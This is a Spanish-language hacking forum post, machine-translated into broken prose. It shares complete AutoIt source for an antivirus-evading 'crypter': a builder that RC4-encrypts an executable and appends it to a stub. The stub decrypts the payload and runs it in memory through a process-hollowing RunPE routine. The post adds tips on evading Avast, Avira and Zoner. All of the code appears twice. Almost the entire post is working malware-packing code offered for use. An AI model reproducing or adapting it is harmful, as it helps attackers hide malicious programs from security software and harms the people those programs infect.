ES-Entendendo-Crypter-AU3-E-saltando-avs
:: Entrada
Página 1 de 1.
ES-Entendendo-Crypter-AU3-E-saltando-avs
Queda de Faraó Miér Mar 14, 2012 3:30 am
buenos amigos otra vez voy a publicar aquí una fuente de Crypter AU3 en equipo y la técnica de cómo obtener el AVS
[PHP]#NoTrayIcon
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include <rc4.au3>
#Region ### START Koda GUI section ### Form=
Opt("GuiOnEventMode",1)
$a = GUICreate("", 610, 219, 192, 124)
GUISetIcon("C:\Users\MineiirO\Desktop\A.D.I Icones\perso7.ico", -1)
GUISetBkColor(0x000000)
$Open = GUICtrlCreateButton("Open", 488, 64, 105, 41)
$Cryptar = GUICtrlCreateButton("Cryptar", 488, 152, 113, 41)
$Arquivo = GUICtrlCreateInput("Arquivo", 8, 72, 473, 21)
$Label1 = GUICtrlCreateLabel(" IsNoT Crypter By MineiirO ", 72, 16, 316, 23)
GUICtrlSetFont(-1, 12, 800, 2, "Swis721 BT")
GUICtrlSetColor(-1, 0xFF0000)
GUISetOnEvent($Gui_Event_Close, "sr")
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
GUICtrlSetOnEvent($Open, "Open")
GUICtrlSetOnEvent($Cryptar, "Cs")
Func Open()
GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
Func Cs()
if GuiCtrlRead($Arquivo) = "" then return
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar, "Key")
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("Wy4530"))
FileWrite($salvar, $ar)
FileClose($stub)
FileClose($Arquivo)
FileClose($Salvar)
MsgBox(64, "Encriptado By MineiirO ! A.D.I FÊNIX! ", "")
EndFunc
Func sr()
Exit
EndFunc
While 1
Sleep(1)
WEnd[/PHP]
Stub
[PHP] #NoTrayIcon
#Include <rc4.au3>
#include <RunPe.au3>
$file = FileOpen(@ScriptFullPath, 0)
$Data = FileRead($file)
$Data = StringMid($Data, StringInstr($Data, "Separador") + StringLen ("Separador"))
$Data = _RC4($Data, "Key")
_RunPE($Data)[/PHP]
RC4
[PHP] Func _RC4($DATA, $key)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $key, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc[/PHP]
RUMPE
[PHP]Func _RunPE($Lgfaklwgfa2BBINARYIMAGE)
Local $Lgfaklwgfa2BBINARY = Binary($Lgfaklwgfa2BBINARYIMAGE)
Local $Lgfaklwgfa2TBINARY = DllStructCreate("byte[" & BinaryLen($Lgfaklwgfa2BBINARY) & "]")
DllStructSetData($Lgfaklwgfa2TBINARY, 1, $Lgfaklwgfa2BBINARY)
Local $Lgfaklwgfa2PPOINTER = DllStructGetPtr($Lgfaklwgfa2TBINARY)
Local $Lgfaklwgfa2TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $Lgfaklwgfa2TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($Lgfaklwgfa2TSTARTUPINFO), "ptr", DllStructGetPtr($Lgfaklwgfa2TPROCESS_INFORMATION))
Local $Lgfaklwgfa2HPROCESS = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Process")
Local $Lgfaklwgfa2HTHREAD = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Thread")
Local $Lgfaklwgfa2TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($Lgfaklwgfa2TCONTEXT, "ContextFlags", 65538)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT))
Local $Lgfaklwgfa2TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
Local $Lgfaklwgfa2SMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "Magic")
If Not ($Lgfaklwgfa2SMAGIC == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(3, 0, 0)
EndIf
Local $Lgfaklwgfa2TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += 4
If DllStructGetData($Lgfaklwgfa2TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(4, 0, 0)
EndIf
Local $Lgfaklwgfa2TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $Lgfaklwgfa2PPOINTER)
Local $Lgfaklwgfa2INUMBEROFSECTIONS = DllStructGetData($Lgfaklwgfa2TIMAGE_FILE_HEADER, "NumberOfSections")
$Lgfaklwgfa2PPOINTER += 20
Local $Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += 96
Local $Lgfaklwgfa2IMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "Magic")
If $Lgfaklwgfa2IMAGIC <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $Lgfaklwgfa2IENTRYPOINTNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
$Lgfaklwgfa2PPOINTER += 128
Local $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "ImageBase")
Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
$Lgfaklwgfa2ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
Local $Lgfaklwgfa2PREMOTECODE = $Lgfaklwgfa2ACALL[0]
Local $Lgfaklwgfa2PHEADERS_NEW = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER)
Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE, "ptr", $Lgfaklwgfa2PHEADERS_NEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
Local $Lgfaklwgfa2TIMAGE_SECTION_HEADER
Local $Lgfaklwgfa2ISIZEOFRAWDATA, $Lgfaklwgfa2PPOINTERTORAWDATA
Local $Lgfaklwgfa2IVIRTUALADDRESS
For $Lgfaklwgfa2I = 1 To $Lgfaklwgfa2INUMBEROFSECTIONS
$Lgfaklwgfa2TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2ISIZEOFRAWDATA = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "SizeOfRawData")
$Lgfaklwgfa2PPOINTERTORAWDATA = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER) + DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "PointerToRawData")
$Lgfaklwgfa2IVIRTUALADDRESS = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "VirtualAddress")
If $Lgfaklwgfa2ISIZEOFRAWDATA Then
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IVIRTUALADDRESS, "ptr", $Lgfaklwgfa2PPOINTERTORAWDATA, "dword", $Lgfaklwgfa2ISIZEOFRAWDATA, "dword*", 0)
EndIf
$Lgfaklwgfa2PPOINTER += 40
Next
DllStructSetData($Lgfaklwgfa2TCONTEXT, "Eax", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IENTRYPOINTNEW)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT))
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $Lgfaklwgfa2HTHREAD)
EndFunc[/PHP]
Los buenos amigos son algunas maneras de final ir simple de la AVS:
Zoner--
Código: Seleccionar todo
ShellExecuteWait(@Scriptdir & "\upx.exe", '-d stub.exe', @scripdir &'\','open',@SW_HIDE)
Para eliminar avast y avira asiento con la cabeza RC4 cifrar y RunPE
Una vez que quede claro que este post es de mi total de Altor
[PHP]#NoTrayIcon
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include <rc4.au3>
#Region ### START Koda GUI section ### Form=
Opt("GuiOnEventMode",1)
$a = GUICreate("", 610, 219, 192, 124)
GUISetIcon("C:\Users\MineiirO\Desktop\A.D.I Icones\perso7.ico", -1)
GUISetBkColor(0x000000)
$Open = GUICtrlCreateButton("Open", 488, 64, 105, 41)
$Cryptar = GUICtrlCreateButton("Cryptar", 488, 152, 113, 41)
$Arquivo = GUICtrlCreateInput("Arquivo", 8, 72, 473, 21)
$Label1 = GUICtrlCreateLabel(" IsNoT Crypter By MineiirO ", 72, 16, 316, 23)
GUICtrlSetFont(-1, 12, 800, 2, "Swis721 BT")
GUICtrlSetColor(-1, 0xFF0000)
GUISetOnEvent($Gui_Event_Close, "sr")
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
GUICtrlSetOnEvent($Open, "Open")
GUICtrlSetOnEvent($Cryptar, "Cs")
Func Open()
GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
Func Cs()
if GuiCtrlRead($Arquivo) = "" then return
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar, "Key")
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("Wy4530"))
FileWrite($salvar, $ar)
FileClose($stub)
FileClose($Arquivo)
FileClose($Salvar)
MsgBox(64, "Encriptado By MineiirO ! A.D.I FÊNIX! ", "")
EndFunc
Func sr()
Exit
EndFunc
While 1
Sleep(1)
WEnd[/PHP]
Stub
[PHP] #NoTrayIcon
#Include <rc4.au3>
#include <RunPe.au3>
$file = FileOpen(@ScriptFullPath, 0)
$Data = FileRead($file)
$Data = StringMid($Data, StringInstr($Data, "Separador") + StringLen ("Separador"))
$Data = _RC4($Data, "Key")
_RunPE($Data)[/PHP]
RC4
[PHP] Func _RC4($DATA, $key)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $key, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc[/PHP]
RUMPE
[PHP]Func _RunPE($Lgfaklwgfa2BBINARYIMAGE)
Local $Lgfaklwgfa2BBINARY = Binary($Lgfaklwgfa2BBINARYIMAGE)
Local $Lgfaklwgfa2TBINARY = DllStructCreate("byte[" & BinaryLen($Lgfaklwgfa2BBINARY) & "]")
DllStructSetData($Lgfaklwgfa2TBINARY, 1, $Lgfaklwgfa2BBINARY)
Local $Lgfaklwgfa2PPOINTER = DllStructGetPtr($Lgfaklwgfa2TBINARY)
Local $Lgfaklwgfa2TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $Lgfaklwgfa2TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($Lgfaklwgfa2TSTARTUPINFO), "ptr", DllStructGetPtr($Lgfaklwgfa2TPROCESS_INFORMATION))
Local $Lgfaklwgfa2HPROCESS = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Process")
Local $Lgfaklwgfa2HTHREAD = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Thread")
Local $Lgfaklwgfa2TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($Lgfaklwgfa2TCONTEXT, "ContextFlags", 65538)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT))
Local $Lgfaklwgfa2TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
Local $Lgfaklwgfa2SMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "Magic")
If Not ($Lgfaklwgfa2SMAGIC == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(3, 0, 0)
EndIf
Local $Lgfaklwgfa2TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += 4
If DllStructGetData($Lgfaklwgfa2TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(4, 0, 0)
EndIf
Local $Lgfaklwgfa2TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $Lgfaklwgfa2PPOINTER)
Local $Lgfaklwgfa2INUMBEROFSECTIONS = DllStructGetData($Lgfaklwgfa2TIMAGE_FILE_HEADER, "NumberOfSections")
$Lgfaklwgfa2PPOINTER += 20
Local $Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += 96
Local $Lgfaklwgfa2IMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "Magic")
If $Lgfaklwgfa2IMAGIC <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $Lgfaklwgfa2IENTRYPOINTNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
$Lgfaklwgfa2PPOINTER += 128
Local $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "ImageBase")
Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
$Lgfaklwgfa2ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
Local $Lgfaklwgfa2PREMOTECODE = $Lgfaklwgfa2ACALL[0]
Local $Lgfaklwgfa2PHEADERS_NEW = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER)
Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE, "ptr", $Lgfaklwgfa2PHEADERS_NEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
Local $Lgfaklwgfa2TIMAGE_SECTION_HEADER
Local $Lgfaklwgfa2ISIZEOFRAWDATA, $Lgfaklwgfa2PPOINTERTORAWDATA
Local $Lgfaklwgfa2IVIRTUALADDRESS
For $Lgfaklwgfa2I = 1 To $Lgfaklwgfa2INUMBEROFSECTIONS
$Lgfaklwgfa2TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2ISIZEOFRAWDATA = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "SizeOfRawData")
$Lgfaklwgfa2PPOINTERTORAWDATA = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER) + DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "PointerToRawData")
$Lgfaklwgfa2IVIRTUALADDRESS = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "VirtualAddress")
If $Lgfaklwgfa2ISIZEOFRAWDATA Then
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IVIRTUALADDRESS, "ptr", $Lgfaklwgfa2PPOINTERTORAWDATA, "dword", $Lgfaklwgfa2ISIZEOFRAWDATA, "dword*", 0)
EndIf
$Lgfaklwgfa2PPOINTER += 40
Next
DllStructSetData($Lgfaklwgfa2TCONTEXT, "Eax", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IENTRYPOINTNEW)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT))
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $Lgfaklwgfa2HTHREAD)
EndFunc[/PHP]
Los buenos amigos son algunas maneras de final ir simple de la AVS:
Zoner--
Código: Seleccionar todo
ShellExecuteWait(@Scriptdir & "\upx.exe", '-d stub.exe', @scripdir &'\','open',@SW_HIDE)
Para eliminar avast y avira asiento con la cabeza RC4 cifrar y RunPE
Una vez que quede claro que este post es de mi total de Altor
Queda de Faraó- Moderador
- Mensajes : 11
Fecha de inscripción : 13/03/2012
Temas similares» Crypter coder poseidon Crypter Rats
» Crypter 99% FUD
» F.b.i crypter
» hao crypter
» Ice Crypter mod by pasanomas
» Crypter 99% FUD
» F.b.i crypter
» hao crypter
» Ice Crypter mod by pasanomas
:: Entrada
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.|
|
|